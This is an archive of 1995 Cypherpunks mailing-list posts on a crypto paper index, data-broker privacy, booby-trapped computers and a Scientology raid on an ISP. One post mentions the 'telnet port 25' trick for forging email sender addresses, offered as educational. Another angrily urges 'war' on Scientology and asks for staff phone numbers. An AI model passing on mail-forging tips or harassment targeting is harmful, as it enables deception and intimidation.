|| mention a few:
||
|| 1. First and foremost, _copyright_ issues. Most articles are copyrighted
|| (automatically, by Berne Convention) and the permission of the authors
must
|| be obtained. Authors may also collect royalties, or the conferences may,
so
|| unlimited electronic distribution is a potential problem.
||
|| NASA can publish its reports (and those of other government agencies)
|| electronically because it has the copyrights, or the copyrights are free
|| and clear. Try putting someone's article on the Net without their
|| permission and look out.
||
|| Indeed, there are a couple of the most important papers on the soda
archive
|| site, some of them scanned-in and OCRed by "The Information Liberation
|| Front." There are so few that the authors likely don't even know they
are
|| there, or care. But try to put lots of copyrighted material on a site
and
|| get ready for actions. Remember, most nations are party to the Berne
|| Convention(s).

Hmmm... I guess I didn't specifically mention this point since it seemed
obvious to me, though I probably should have:  Papers should come from the
authors or the organization which holds the copyright.  I wouldn't be in
favor of accepting 3rd party submissions, for both copyright and
authenticty/integrity issues.

||
|| 2. Many of the papers have complex typography, lots of equations and
|| diagrams. These reproduce poorly on most screens, and really need a new
|| level of display presentation. (Yes, I know about Adobe Acrobat, which I
|| have. Ditto for FrameMaker, and a few other such systems. But not many
|| others have them.)
||
|| I happen to know the ILF member who posted the Chaum "Dining
|| Cryptographers" paper, anonymously, and know that he picked that paper
both
|| because of its importance to his interests and because it was pure text,
|| with no equations and no diagrams. This made it a natural for scanning.
||

The model we've used so far is that the format of the papers is independant
of the bibliographic information which we index.  For example, the NASA
system I mentioned has papers in both HTML and Postscript formats.  The
abstracts (which are what's indexed) simply contain URLs, and don't really
care what the document types are.

In my experience, most of the target audience for technical papers has
access to a postscript previewer (for online viewing) and/or a postscript
printer, so postscript tends to be the format of choice.  Still, it can be
anything; text, PDF, scanned in TIFF files all have worked for us in the
past.

|| 3. In the crypto domain, the papers are much more conveniently
concentrated
|| into a handful of conference proceedings, nearly all published by
|| Springer-Verlag. (Those great silvery-grey paperbacks.)
||
|| This point about Springer-Verlag relates to Item #1 above. Namely, that
|| copyright holders (Springer-Verlag, through publishing arrangements with
|| the conferences) will not take kindly to folks making the papers
available
|| electronically.
||
|| This point, about the limited number of main crypto volumes, also
implies
|| another point: many of these papers refer to other papers in the same
|| volume or set of volumes (e.g., papers in the "Crypto '93 Proceedings"
will
|| refer to papers in that volume or earlier volumes). This makes it *even
|| more advantageous* for a serious researcher to buy the complete set of
|| volumes.
||

Now that's a pretty good point.  Wonder if we could convince them to make
their papers available electronically? 8-)

But ignoring them, there still seem to be a fair amount of cryptography
papers published as technical reports by individual authors or
organizations.  These would be what I'd like to see in CTRS.

|| 4. Authentication issues. Electronic versions of articles will need to
be
|| signed, to prevent unauthorized modifications. The infrastructure for
this
|| is beginning to build, but is clearly not available to many.
||
|| I am confident that someday most journals will be published
electronically.
|| Many people think this likely, whether in 5 years or 15 years. Just too
|| many advantages.
||

Another good point, but I think this could easily be marked down as an
issue to be worked on after the basic functionality is available.  I'd hate
to see this as a reason for not doing something.

|| However--and this is my point--before that happens a huge amount of
|| negotiation about author's rights to reproduction, about verification of
|| copies, about royalty payments for copies, etc., has to happen. And, the
|| display software/hardware is not quite there yet....too many people
would
|| be unable to see the equations and diagrams on the screen. In 5 years,
less
|| of a problem.
||
|| Many authors make their papers available by anonymous ftp, or via the
Web.
|| I think this is the way to do it: let those who feel their papers need
|| electronic dissemination do so. The author makes the choice.

This is exactly the target audience I'm looking for.  When an author wants
to put a paper up on his FTP or WWW site, I hope they'll also send me the
indexing information so that when people want to find it, they can use
CTRS. I'm not interested in actually storing a copy of the report, although
I'm willing to do so if they cannot make it available any other way.

||
|| In summary, this project is probably premature (technologically), has
|| numerous copyright issues to be resolved, and is probably less needed in
|| the crypto community than in some other areas.
||
|| (Granted, we are not following those other areas, necessarily. But that
|| other domains have not yet gone fully electronic is indicative that
others
|| see some of these same problems, and are likely to address them before
the
|| math/crypto community does.)
||

I have to disagree strongly about the technologically premature part, since
I have had a lot of experience to the contrary during my involvment with
several major technical report systems.  I'm afraid I also have to disagree
with you about the need for this service.  Having attempted to find some of
the reports which I've heard are available on the Net, I'd have to say it's
not a task I'd set an Internet novice too, or one I'd give to someone on a
deadline.  I think a good bibliographic database like I propose in CTRS
would be a definite help.  And at the very very very least, it probably
won't hurt. 8-)

|| Sorry to dissect this proposal so thoroughly, but it's one of the things
I do.
||

S'ok with me.  It's not like I'm dead set on doing this or anything.  It's
just an observation, and an offer of service if anyone thinks it'd be
useful.

Oh, BTW, another thing I probably should mention that seems obvious to me:
 I'm offering to do this for free.  That is, the database would be a public
service, with no charge to list papers, add another database to the
searching list or to query/retrieve abstracts.


--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 6 Sep 95 09:55:18 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Searchable Crypto Paper Archive?
In-Reply-To: <199509061632.MAA00622@james.bwh.harvard.edu>
Message-ID: <199509061650.MAA01945@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 6, 12:32, Adam Shostack sent the following to the NSA's mail
archives:
> Subject: Re: Searchable Crypto Paper Archive?
|| | Anyway, this is what I'd like to see.  I'm willing to work on such a
|| | system if there's enough positive feedback.  Does anyone else think
|| | they'd like to use or contribute to such a system?
|| |
||
|| I think this would be a fabulously useful service, one which I'd be
|| glad to subscribe to as an amateur.  (I could see forking over $20-50
|| for search priority, possibly more if it was really well done).
||

Ack!  Money involved? "Just say no!" 8-)  When I said "contribute" I meant
placing papers in it, or if you've got a lot already, adding your own
database to the list of possible search sites.

I wanna do this as a free service.  There are several reasons (like I can't
see charging people for information that I didn't even produce), but the
real reason for doing it is simple: I wanna use it.

I made a mock up of CTRS, which is available at:

	http://www.itribe.net/CTRS/
	https://www.itribe.net/CTRS/	 (of course we have to offer SSL
8-)

There aren't any crypto papers in it yet, though.  The iTRiBE database (the
only one available for searching right now) is filled with some NASA test
data.  Try doing searches on things like "ratio" or "nasa" for an example
of the output you'd get.

||
||	Don't forget the value of sci.crypt[.research] and cypherpunks
|| postings, nor of crypto 'rump session' papers.

I admit I hadn't thought of these.  I'm not sure I could sign up for the
task of archiving the newsgroups (disk space) but if the authors/copyright
holders of rump papers want to submit them, I'd be happy to index them.  I
don't think the database necessarily has to be composed only of referreed
papers or anything.  I'd be happy to index rump papers, technical reports
or maybe even presentation materials like postscript copies of overhead
transparencies.

Anyway, thanks for the reply!

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scottg@b4a206.mdc.com (TECO Master)
Date: Wed, 6 Sep 95 13:28:28 PDT
To: CYPHERPUNKS@toad.com
Subject: Where is Secure Drive 1.4?
Message-ID: <95090613224714@b4a206.mdc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<Decloaking after 3+ years>

Hi Folks,

I have a previous version of SecureDevice (v1.3).
Is v1.4 the current version or something higher?
Where is an FTP site so I can grab it?

TIA,

scott gallaher <scottg@b4a206.mdc.com> | I believe in the 1st Amendment.
TECO Master & DBA		       | Pornography is just a fringe benefit.
PGP Key fingerprint: AD A8 C9 AA D7 D3 6A E3  0C 58 5A 10 41 37 45 EE

GCS d- s+: a C++++ U->L++++ P? L>+++ !E[teco+++] W N++ k- w--- !O M- V$ PS+
PE Y++ PGP(++) t+ !5 X R(++) tv+ b++(+++) DI+ !D G e++ h----(*) r+++ y++++(++*)
	-- Geek Code V3.0

<Resuming lurking mode...>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBME4SV9PstJd5R1NxAQFN9wH/UYh59UzgBKotUs/HDYJ7jHEPlcmOIy/E
Zo74KQcSb9QtaPMntSpHiZq3W1ZaIRrl+jx9HkZbsBbXHRVi7+HGXQ==
=xvbE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Wed, 6 Sep 95 11:39:07 PDT
To: Black Unicorn <shamrock@netcom.com>
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <m0sqPMa-00069JC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:00 AM 9/6/95 -0400, Black Unicorn wrote:

>Created crimes are few and far between.
  
You mean like buying a 30 round magazine, or putting a different
stock of your choice on a rifle, or owning an automatic weapon,
or mailing crypto out of the country, or hiring someone due to their
race, or not hiring someone because they are "fat?"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 6 Sep 95 12:52:37 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <v01510102ac73a743a371@[198.59.115.139]>
MIME-Version: 1.0
Content-Type: text/plain


Cort Starrett wrote,
>Put bluntly, will cryptography put lawyers out of business?

Even in a cryptoanarchy I would want to treat customers kindly and I would
want to make sure that in any agreement that both parties are clear as to
when we are complying or not.  A lawyer might help in complex cases.
Especially if UCC is referenced.

And in some kinds of escrow a "judge" might be invoked if there is a
despute.  The judge might be a lawyer or might bring in a lawyer as an
expert.

The nature of the work of a lawyer in a crytoanarchy might be very
different.  Lawyers might even become highly respected and liked!

Dar
(list newbie)

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 6 Sep 95 10:54:06 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <199509060419.XAA04296@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950906135128.3037A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Jim Choate wrote:

> As far as I know the owner of property has no legal right to kill a person
> either traspassing or stealing it in any of the 50 states. There was a
> recent federal ruling that basicly says that if you meet a burglar in your
> home at nite you can not kill or otherwise harm them unless you're life is
> directly threatened. In short, you MUST give up the ground if at all
> possible.

In Maryland you have the responsibility to retreat if possible when 
confronted by someone threatening your life or limb.  If you are unable 
to retreat or are in your domicile (or motel room, etc.) you have the 
right to use deadly force to stop an attack.

You certainly do not have the right to use deadly force against someone 
for any other reason than immediate threat of life or limb to you or 
someone else.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 6 Sep 95 10:56:41 PDT
To: cypherpunks@toad.com
Subject: Anonymous CU-SeeMe reflector
Message-ID: <Pine.SUN.3.91.950906135430.3037C-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



If anybody has worked on or is interested in working on creating an 
anonymous CU-SeeMe reflector, please contact me (where anonymous in this 
case means that CU-SeeMe clients do not report the proper IP numbers of 
other clients).  I've done a bit of work on it but can't quite get 
"normal" reflector behaviour.

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Wed, 6 Sep 95 04:37:21 PDT
To: cypherpunks@toad.com
Subject: Re: Police and scientology visit XS4ALL Amsterdam
Message-ID: <199509061135.AA26720@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain



>         PRESS RELEASE
>         -------------
>     Police and members of Scientology church enter offices of XS4ALL
>     ================================================================
They really are not getting it - are they stupid or what?
Scientology people are not behaving so I take a standing
that I don't have to behave when I treat them as well.
Good, remember they started it ...

> Today at about 14:00, XS4ALL was visited by Mr. S. Braan,
> bailiff. 
Sorry to hear that Mr. Braan

>Religious Technology Centre
O camoon - that name sounds great what's
inside it? Research department of Brainwashing?
Wast that the technology you tried to sell
to CIA? And luckily CIA told you to piss off.

>, better known as the Scientology Church, or
> Scientology for short. He was assisted by a local police officer and Mr.
> Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology
> in The Netherlands. 

We would need a list of all legal offices representing scienos 
in all countries. Also does anyone has a list of top scienos
and some kind of organization flow chart of this evil 
emperium?

>Also present were two computer experts (Mr. Ootjes
> and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and
> two American employees of Scientology, Mr. Weightman and Ms. Jenssen.
Does anyone has tel number to these Co$s?

> Scientology is filing for seizure of XS4ALL's computer equipment. Under
> dutch law, this means that a bailiff comes in to record your assets. In
> real-life, the computer-experts that were present have recorded the
> types and serial numbers of all the computers in our offices. They did
> not take any equipment, the continuity of XS4ALL's services is not in
> jeopardy.
Good - you have civilised police there.

> XS4ALL is not alone in receiving this kind of attention from
> Scientology. Scientology, a semi-religious multinational, is at war with
> a number of people on the Internet. 
They wan't a war - well let's give them one! I don't mean this
bashing in the net - I mean a REAL WAR! Co$ has been on
offensive for some time now and they must be got to the defence mode.

> Until recently, the church has always managed to supress critical voices
> by means of sheer intimidation and by engaging in endless legal battle.
I think it would be a jolly good day if they would try that against 
me. I would make best of it...

> One of these documents is a piece to which Scientology supposedly holds
> the copyright and which has been added to the kit without the church's
> permission.
Screw with their permission.

Sorry for the raw language but I get so damn angry when I even see
these scienos mentioned. 

To fight them we need an organization to fight them. Todays
situation is like uncontrolled and thefore unoptimised guerrilla
operations. Results will be weak.

Best Regards
Kari Laine
Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Lambert <dlambert@aigtc.com>
Date: Wed, 6 Sep 95 11:36:35 PDT
To: cypherpunks@toad.com
Subject: Anonymous http daemon?
Message-ID: <199509061821.OAA01040@ptolemy>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

Some time ago, there were some discussions concerning an
anonymous http daemon.  As far as I can recall, the discussion
just sort of trailed off, and nothing got implemented.

I'm considering making an anonymous server available, and
would like:
   1. to know whether I need to hack some code
      (or if someone has done so already)
   2. to reopen the discussion of the desirable
      characteristics such a beast would possess.

- David C. Lambert
  dlambert@aigtc.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 15:16:06 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSI.3.91.950906163504.11543A-100000@usis.com>
Message-ID: <Pine.LNX.3.91.950906150842.2139A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> Well, I did say all typos were _mine_ -- That's 1995 folks, just for the
> record and thanks to Tom Swiss for being the first in a long line
> of people who will point this out. :-)

-would you expect anything less from us? <g>
> 
> But back to the topic; am I the only one who gets the willies just
> reading this?  

Beyond having the willies.. This is more than just scary, it feels like
rape when you think about it for awhile. Everything you buy, on credit, is
recorded and sold to someone who wants to know your secrets. Everytime 
you make a banking transaction, someone is watching and compiling the 
data. 

Is there any legal recourse to get your name removed from the sellable list?
Or is it too late and we can not save even the vestiges of our privacy?

Oh, but if only I had the 'hacker' skill to break into such a database..
I have always been against the destruction of data.. but there are 
exceptions...

RobL <another newbie to the list.. >





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 6 Sep 95 12:39:50 PDT
To: cypherpunks@toad.com
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <Pine.LNX.3.91.950906115827.23559B-100000@on-ramp.ior.com>
Message-ID: <9509061938.AA02249@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Under UK law it is certainly illegal to create any device with the
intention of causing greivous bodily harm to anyone. The right to self
defense is very precisely that, the right to take reasonable steps to 
defend yourself with commensurate force if attacked.

If someone hits you in the face you do not have the right to kill
him. If someone tries to do serious harm to you and the only way
to avoid that harm is to kill them that is self defense.


There is no self defense argument where the purpose is not to prevent
physical harm. 

Any device intended to cause harm to someone tampering with a computer
could well land the perpetrator in jail for a very long time for
attempted murder or murder.


People who go round drawing parallels to gun ownership and cryptography 
ownership are simply playing into the governments hands. Cryptography has net 
benefits to society. Most advocates of gun ownership tend to convince me of 
little more than they are a danger to society. Regardless of their case they are 
the biggest argument for gun control, and therfore poor advocates of their 
cause. I see their attempts to draw parallels with cryptography to be little 
more than trying to shore up their sinking ship with one thats afloat.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Wed, 6 Sep 95 13:51:15 PDT
To: cypherpunks@toad.com
Subject: Collection of personal info
Message-ID: <Pine.BSI.3.91.950906151200.9473A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain



I sent this to the risks moderator some time back, but I guess
he didn't like it.  For those of you who think that perhaps
people advocating cybercash are just a bunch of paranoid lunatics.

--------------
As advertised in the trade magazine "DM News" (Direct Marketing News),
Apr. 24, 1997, V. 17 N. 16.  I've typed the entire text of the advertisement,
any typos are mine.

From the huge number of people in the database, it would seem that TRW
is now marketing a subset of their credit records they keep on everyone.
Does anyone else remember the flap over Lotus' product (Magellan) that
was going to allow something similar?  

The risks? This is the perfect database if you want to red-line your offerings.
I'm sure others will have more creative answers. 


--------------
TRW DISCOVERED


Some very smart people are uncovering exciting ways to increase response rates,
find profitable customers, and develop new market niches.  It's been a well
kept secret.  Now it's out.

It's TRW.

It all started with the search for more creative information solutions.
Solutions that help you discover hidden markets and unique ways of using
ordinary data to target qualified prospects.

The result: a proven and massive database in the hands of people with
real data management know-how.

So far the findings have revealed:
 o A database of 170+ million consumers
 o 100+ demographic, psychographic and geographic selects
 o A full range of computer services.
 o Comprehensive motor vehicle data

From this comes an array of products and services to intrigue even the most
seasoned direct marketer.  One of these is called the TRW Smart Targeting Tools (SM).
It links 98 million households with the goods and services they are most likely
to buy.  Choose consumer names by 50 neighborhood or 3600 household level clusters,
by 56 broad product categories or by 516 specific product or brand preferences.

Looking at all the advantages, TRW may be the direct marketer's find of this
century.  And the next.

Energize your marketing.  Contact your TRW representative or call 800.527.3933
Ext 640.  You have a great find ahead of you.


TRW Target Marketing Services
Your one source for reaching all the right people.

701 TRW Parkway
Allen, TX 75002-3717
800.527.3933



David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Wed, 6 Sep 95 15:51:05 PDT
To: cypherpunks@toad.com
Subject: Re: Direct Socket to Remailer?
Message-ID: <ac73d0d902021004dc09@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:41 PM 9/3/95, starrd@iia2.org wrote:
>On Fri, 1 Sep 1995, Lance Cottrell wrote:
>
>> You should try the telnet port 25 trick. It is amazingly simple (but not
>> secure). Just "telnet some.machine.com 25" and type help. It will guide you
>> through it. It is quite informative.
>
>Se sure to test it first, sometimes it records who *really* sent it as
>well as the "forged" return address.
>
>Test it by mailing to yourself and then look at all the headers.
>

I should have been more clear. I was advocating this as interesting and
educational, not as an effective anonymity technique.

        -Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 16:09:51 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <ac7376ea1a0210046d3c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:39 PM 9/6/95, David Neal wrote:

>From the huge number of people in the database, it would seem that TRW
>is now marketing a subset of their credit records they keep on everyone.
>Does anyone else remember the flap over Lotus' product (Magellan) that
>was going to allow something similar?
>
>The risks? This is the perfect database if you want to red-line your offerings.
>I'm sure others will have more creative answers.

About the Lotus Marketplace product of several years ago, many of us
thought at the time that the furor was misdirected, and the result
ultimately damaging to privacy concerns.

Why? Because the ZIP code data is _already_ available to the mass
marketers, etc. The Marketplace produce merely made it available to "the
rest of us," allowing many people to have their eyes opened about what
exists.

By getting Lotus to pull the product, the public went back to sleep, lulled
into the false sense of privacy that their ZIP codes were once against
private.

Privacy needs to be protected by keeping some things secret, not by passing
laws limiting the records others can collect from public or voluntarily
offered information.

Don't get me wrong--I don't like TRW Credit, Equifax, TransUnion, or anyone
else compiling "dossiers" on my spending habits, my travel itineraries,
etc. But by using my VISA and MasterCard cards, and by agreeing to their
terms and conditions, I am tacitly accepting that credit reporting agencies
will have access to my transactions.

If there is a "market for privacy," and this is something we've talked
about before, then someone will offer "The Privacy Card." We can debate
what this card might offer, randing from complete unlinkability (ecash
protocols of various sorts) to non-reporting of records to the Big Three of
credit reporting agencies. Even cards issued in the name of pseudonyms, of
various sorts and backings.

Should there be laws _against_ this kind of Privacy Card, we should fight
these laws.

But we should not lull ourselves into a false sense of security by adopting
the unconstitutional and anti-liberty approach of having "Fair Credit
Reporting Act" and "Data Privacy Act" sorts of laws.

In my opinion, of course.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 16:16:27 PDT
To: Rob Lowry <cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <ac737a2b1b0210043115@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 PM 9/6/95, Rob Lowry wrote:

>Beyond having the willies.. This is more than just scary, it feels like
>rape when you think about it for awhile. Everything you buy, on credit, is
>recorded and sold to someone who wants to know your secrets. Everytime
>you make a banking transaction, someone is watching and compiling the
>data.
>
>Is there any legal recourse to get your name removed from the sellable list?
>Or is it too late and we can not save even the vestiges of our privacy?

Rob, I have entered this posting of yours into the "BlackNet Dossier
Service" I operate.

Sounds creepy and scary, eh? Well, it's part of freedom.

The "legal recourse" you mention about having your name taken off lists
kept by people or agencies ultimately involves visits by the authorities to
private homes (like mine) to verify that the data are being "properly
collected" and that no "illegal or incorrect data" are being stored.

If someone wants something kept secret, the solution is to keep it secret.

If someone doesn't want their postings going into my 220 megabyte file of
postings, they shouldn't send them to me. Or they should adopt a digital
pseudonym, unlinkable to their True Name or any other nyms they may have.

Things are much simpler and less stressful when you don't look to the law
to fix things.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 16:31:35 PDT
To: cypherpunks@toad.com
Subject: Re: Flame: Re: Collection of personal info
In-Reply-To: <9509062238.AA06272@cs.umass.edu>
Message-ID: <Pine.LNX.3.91.950906162650.6403A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain




> Some close friends of mine have been raped, and I get the overwhelming
> impression from them that rape has about as much in common with the sale of
> financial databases as it does with Rice-a-Roni. Find a better analogy, or
> you'll sound about as credible as those who insist the Internet teems with
> pedophilic bombers who push dope outside preschools.

Sorry if my choice of words offended you.. the intent was to express the 
feeling of being violated without consent. Perhaps I should have used the 
term violated or some other less violent term.

The point being, I did not give permission for my records to be 
distributed, nor did I see a disclaimer on my credit cards that states 
that the transactions I make will be sold off to mailing houses in order 
to target me for additional sales.

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Wed, 6 Sep 95 14:44:05 PDT
To: "Thomas M. Swiss" <tms@TIS.COM>
Subject: Re: Collection of personal info
In-Reply-To: <199509062125.RAA10123@ziggy.tis.com>
Message-ID: <Pine.BSI.3.91.950906163504.11543A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Sep 1995, Thomas M. Swiss wrote:

> 
> David Neal <dneal@usis.com> writes:
> 
> >I sent this to the risks moderator some time back, but I guess
> >he didn't like it. 
> 
>      I can guess why; PGN might be skeptical of your precognitive powers. B->
> 
> >...
> >As advertised in the trade magazine "DM News" (Direct Marketing News),
> >Apr. 24, 1997, V. 17 N. 16.  I've typed the entire text of the advertisement,
>           ^^^^

Well, I did say all typos were _mine_ -- That's 1995 folks, just for the
record and thanks to Tom Swiss for being the first in a long line
of people who will point this out. :-)

But back to the topic; am I the only one who gets the willies just
reading this?  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 16:37:53 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Collection of personal info
In-Reply-To: <ac737a2b1b0210043115@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.950906163311.6403B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


> Rob, I have entered this posting of yours into the "BlackNet Dossier
> Service" I operate.

At least you notified me.. :) Something the TRW crew or others like them 
do not do.


> If someone doesn't want their postings going into my 220 megabyte file of
> postings, they shouldn't send them to me. Or they should adopt a digital
> pseudonym, unlinkable to their True Name or any other nyms they may have.

This is true.. I could adopt a nym, such as I use on my BBS, or when I am 
doing other stuff on the net.. but it is difficult at best to get a new 
set of credit cards, ID and so on with a new name/alias and still 
maintain your own name. If it were possible to have an alias in real 
life, as easy as it is to get one on the 'net that is, then I would most 
certainly do so..

'Frothmonger' <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 17:08:05 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.SUN.3.91.950906194621.9114A-100000@polaris.mindport.net>
Message-ID: <Pine.LNX.3.91.950906165743.8113A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> Which tells me how serious you really are about your privacy.  You have 
> made a decision here about how much trouble privacy is worth to you, 
> which is "not much."

If I were single, it would be a lot easier to just start making up names 
and living under assumed aliases.. but with a wife and two kids, I have 
to follow the rules a bit more.. 

My privacy is worth variable amounts depending on who has access to it.. 
I certainly do not care if anyone on this list knows who I am or not, as 
it is something I voluntarily chose to join. Selling info about me, 
without notifying me before hand is another situation altogether. Even 
the magazines I subscribe to have notices that my name may be sold.. and 
the mags that don't have such a warning, but sell my name anyways, get 
cancelled as soon as I discover it. Far easier to stop by the local PC 
store and buy it a week later than to have mounds of junk mail piling up.

> I hear people bitch about privacy endlessly.  Privacy helps those who 
> help themselves to privacy.  I think Mr. May was precisely correct in saying 
> that it is so much easier and simpler for one to rely on self privacy 
> insurance rather than government privacy insurance.

Again, you both are correct, and perhaps I was overstating my position in 
regards to the TRW/etc. groups.. I have a tendancy to do so. Each of us 
has the responsibility to monitor the activities in our lives, both 
directly and indirectly. Whether this is watching our spending to make 
sure we do no overcharge, or encrypting mail to keep in secure, we need 
to be aware of what we are doing, and the reactions of others as a result 
of our actions. In this case, the action is spending money on credit, and 
the reaction is being monitored by credit agencies. My solution was to 
get rid of all the credit cards 4 years ago.. my credit history is 
trashed in part do to very low activity over the last 4 years, and of 
course, the side effect of maxing out 4 cards.

-stepping off soapbox and looking for the next topic..-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 16:57:45 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <ac7381811c021004ea72@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 PM 9/6/95, Rob Lowry wrote:
>> Rob, I have entered this posting of yours into the "BlackNet Dossier
>> Service" I operate.
>
>At least you notified me.. :) Something the TRW crew or others like them
>do not do.

If you mean that TRW Credit does not inform you every time a transaction is
entered into their files, this is true. Be grateful they don't.

If you mean the existence of the record itself has not been reported to
you, it has hardly been a secret. It has been very well-known for many
years that these records exist, and you can subscribe to a service that
reports to you regularly about your credit record. (No, it is not "free,"
but why should it be? It costs them money to send this stuff to you, and
they see it as a valid business market, as do I. At least the cost is
fairly nominal.)

Again, you are free to use cash, to use a bank card which protects your
privacy, and so forth.

...
>This is true.. I could adopt a nym, such as I use on my BBS, or when I am
>doing other stuff on the net.. but it is difficult at best to get a new
>set of credit cards, ID and so on with a new name/alias and still
>maintain your own name. If it were possible to have an alias in real
